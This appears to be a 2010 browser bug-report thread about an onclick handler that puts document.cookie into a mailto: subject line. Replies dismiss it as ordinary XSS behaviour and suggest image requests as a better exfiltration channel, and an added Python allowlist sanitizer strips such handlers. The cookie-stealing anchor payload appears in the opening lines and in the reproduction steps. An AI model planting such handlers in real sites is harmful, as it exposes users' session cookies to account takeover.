User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:126.96.36.199) Gecko/20100625 Firefox/3.6.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:188.8.131.52) Gecko/20100625 Firefox/3.6.6

<a href="mailto:email@example.com" onclick="this.href='mailto:firstname.lastname@example.org?subject=contact '+document.cookie">Bug</a>

I can mail the content of the cookies.

Reproducible: Always

Steps to Reproduce:
1. <a href="mailto:email@example.com" onclick="this.href='mailto:firstname.lastname@example.org?subject=contact '+document.cookie">Bug</a>
2. Click on it and you can choose which mail client you want to use; choose Thunderbird.
3. See the value of the document.cookie in your subject field.

Actual Results:
The value of the client's cookies in the subject field, or wherever you chose to receive them in.

Expected Results:
Show the literal string in the subject field.

With the cookies mailed to yourself you could possibly authenticate yourself as an admin.

Version information:
Thunderbird: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:184.108.40.206) Gecko/20100512 Lightning/1.0b1 Thunderbird/3.0.5
Firefox: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:220.127.116.11) Gecko/20100625 Firefox/3.6.6
How is this a problem? If you have access to document.cookie you could just send it as an HTTP request, or embed it in an image URL, or any number of other things. I don't see how this is a bug at all.
This is just how the web works, in all browsers. If an attacker can inject an on* handler they win. Here's a cheat-sheet for potential XSS vectors that sites must filter out of user-supplied content, or, given the variety of ways to evade filters, better to reject everything except a known-safe subset. http://ha.ckers.org/xss.html mailto: is not a very promising exfiltration technique -- mail clients will not automatically send the mail, so the user has the chance to notice the extra content, or simply cancel the mail if it was a surprise. But it's trivial to change your code to use something else such as an embedded image.
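The "reject everything except a known-safe subset" approach recommended above, as an added example that is not part of this bug thread: a small allowlist sanitizer using only Python's standard-library html.parser. It keeps a fixed set of tags, attributes and URL schemes and drops everything else, so the onclick handler from the report is removed while the plain mailto: link survives; REPORT_PAYLOAD is a constructed sample, and the dropped list is returned so a site can log injection attempts.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Known-safe subset: tag -> attributes permitted on it. Anything not listed
# (including every on* event handler) is dropped rather than filtered.
ALLOWED_TAGS = {"a": {"href", "title"}, "b": set(), "i": set(), "p": set(), "br": set()}
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def safe_url(value):
    # Relative URLs have no scheme; javascript:, data:, vbscript: etc. are rejected.
    scheme = urlsplit(value.strip()).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # what was removed; worth logging as an injection-attempt signal

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_TAGS[tag] or (name == "href" and not safe_url(value)):
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text (including the body of dropped tags such as <script>) is re-escaped.
        self.out.append(escape(data, quote=False))


def sanitize(markup):
    """Return (clean_html, dropped) for untrusted user-supplied markup."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample modelled on the payload in the report (hypothetical addresses).
REPORT_PAYLOAD = ('<a href="mailto:email@example.com" '
                  'onclick="this.href=\'mailto:x@example.org?subject=\'+document.cookie">Bug</a>')
```

Run sanitize(REPORT_PAYLOAD) to see the onclick attribute stripped; the same function drops javascript: hrefs and unknown tags such as img entirely.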
I completely agree that you need an XSS bug or something like that and that you could do whatever you want if you have access to document.cookie. But it is a bit sloppy; I tested the same thing on Chrome and Internet Explorer and both handle it well. They block it, but okay, if you have access to document.cookie you would probably do something else, like adding it in an image request. I wouldn't expect it to happen, that's all.